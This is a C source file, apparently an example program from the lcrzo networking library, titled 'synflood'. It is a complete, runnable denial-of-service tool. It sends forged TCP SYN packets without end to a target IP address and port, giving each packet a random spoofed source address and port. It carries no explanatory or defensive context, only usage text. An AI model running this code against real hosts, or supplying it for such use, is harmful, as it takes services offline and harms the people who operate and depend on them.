
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
lcrzoex_infos lcrzoex_000129=
{ /*reference*/     "lcrzoex", 129,
  /*version*/       1, 0,
  /*title*/         "synflood",
  /*french title*/  "synflood",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "device src_eth dst_eth dst_ip dst_port",
  /*french usage*/  "device eth_src eth_dst ip_dst port_dst",
  /*usage example*/ "eth0 aa:bb:cc:dd:ee:ff 11:22:33:44:55:66 1.2.3.4 80",
  /*fr. usage ex.*/ "eth0 aa:bb:cc:dd:ee:ff 11:22:33:44:55:66 1.2.3.4 80",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000129_main(int argc, char *argv[]);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000129_main(int argc, char *argv[])
{ lcrzo_spoof spoof;
  lcrzo_device device;
  lcrzo_hdrleth hdrleth;
  lcrzo_hdrlip hdrlip;
  lcrzo_hdrltcp hdrltcp;
  lcrzo_uint32 i;
  
  if ( argc<6 )
  { /* print usage */
    lcrzo_epr(lcrzoex_infos_print(lcrzoex_000129, argv[0]));
    return(LCRZO_ERR_BULCRZOEXBADUSAGE);
  }

  /* initialize device */
  lcrzo_epr(lcrzo_device_init(argv[1], device));

  /* initialize Ethernet header */
  lcrzo_epr(lcrzo_hdrleth_initdefault(&hdrleth));
  lcrzo_epr(lcrzo_etha_init_eths(argv[2], hdrleth.src));
  lcrzo_epr(lcrzo_etha_init_eths(argv[3], hdrleth.dst));

  /* initialize IP header */
  lcrzo_epr(lcrzo_hdrlip_initdefault(&hdrlip));
  lcrzo_epr(lcrzo_ipl_init_hs(argv[4], &(hdrlip.daddr)));

  /* initialize TCP header */
  lcrzo_epr(lcrzo_hdrltcp_initdefault(&hdrltcp));
  hdrltcp.dport=(lcrzo_uint16)atoi(argv[5]);
  hdrltcp.syn=1;

  /* spoof */
  i=0;
  lcrzo_epr(lcrzo_spoof_init(&spoof));
  while(1)
  { i++; if (!(i%100)) printf("%ld\n", i);
    /* set new IP fields */
    lcrzo_uint32_rand(0, 0xFFFFFFFFU, &hdrlip.saddr);
    hdrlip.id++;
    /* set new TCP fields */
    lcrzo_uint16_rand(1024, 65000, &(hdrltcp.sport));
    hdrltcp.seqnum++;
    /* send the packet */
    lcrzo_epr(lcrzo_spoof_ethipopttcpoptdata(&spoof, device, hdrleth,
					     hdrlip, NULL, 0,
					     hdrltcp, NULL, 0, NULL, 0));
  }
  lcrzo_epr(lcrzo_spoof_close(&spoof));

  return(LCRZO_ERR_OK);
}
